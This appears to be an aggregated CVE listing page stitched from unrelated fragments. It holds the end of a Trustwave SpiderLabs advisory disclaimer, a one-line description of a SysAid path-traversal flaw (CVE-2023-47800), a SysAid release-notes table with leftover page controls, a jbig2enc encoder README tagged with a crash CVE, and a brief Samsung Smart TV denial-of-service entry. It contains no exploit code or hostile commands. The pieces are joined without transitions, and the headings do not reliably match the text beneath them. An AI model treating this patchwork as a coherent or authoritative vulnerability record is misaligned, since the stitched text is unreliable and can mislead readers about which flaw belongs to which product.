automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-47800

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

On-Premise Security Enhancements 2023

*   09 Nov 2023
*   1 Minute to read

*   Print
    
*   Share
    
*   Dark
    
    Light
    
*   PDF
    

Contents

*   Updated on 09 Nov 2023
*   1 Minute to read

*   Print
    
*   Share
    
*   Dark
    
    Light
    
*   PDF
    

Article Summary

Share feedback

Thanks for sharing your feedback!

#

CVE #

**Description**

Version

921

CVE-2023-47246  

Additional important security enhancements

23.3.36

871

  

Important security fixes  

23.3.35

23856

  

“Login Failure” message always identical to Username  

23.2.14

Was this article helpful?

**What's Next**

*   22.4.45

Table of contents

*

CVE-2023-47246: On-Premise Security Enhancements 2023 - 2023

jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512.

This is an encoder for JBIG2.

JBIG2 encodes bi-level (1 bpp) images using a number of clever tricks to get better compression than G4. This encoder can:

*   Generate JBIG2 files, or fragments for embedding in PDFs
*   Generic region encoding
*   Perform symbol extraction, classification and text region coding
*   Perform refinement coding and,
*   Compress multipage documents

It uses the (Apache-ish licensed) Leptonica library: http://leptonica.com/

You'll need version 1.68.

**Known bugs**

The refinement coding causes Acrobat to crash. It's not known if this is a bug in Acrobat, though it may well be.

**Usage**

See the jbig2enc.h header for the high level API, or the jbig2 program for an example of usage:

    $ jbig2 -s -p -v *.jpg && pdf.py output >out.pdf
    

to encode jbig2 files for pdf creation. If you want to encode an image and then view output first to include in pdf

    $ jbig2 -s -S -p -v -O out.png *.jpg
    

If you want to encode an image as jbig2 (can be view in STDU Viewer) run:

    $ jbig2 -s feyn.tif &gt;feyn.jb2

CVE-2023-46363: GitHub - agl/jbig2enc: JBIG2 Encoder

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

Tag

#pdf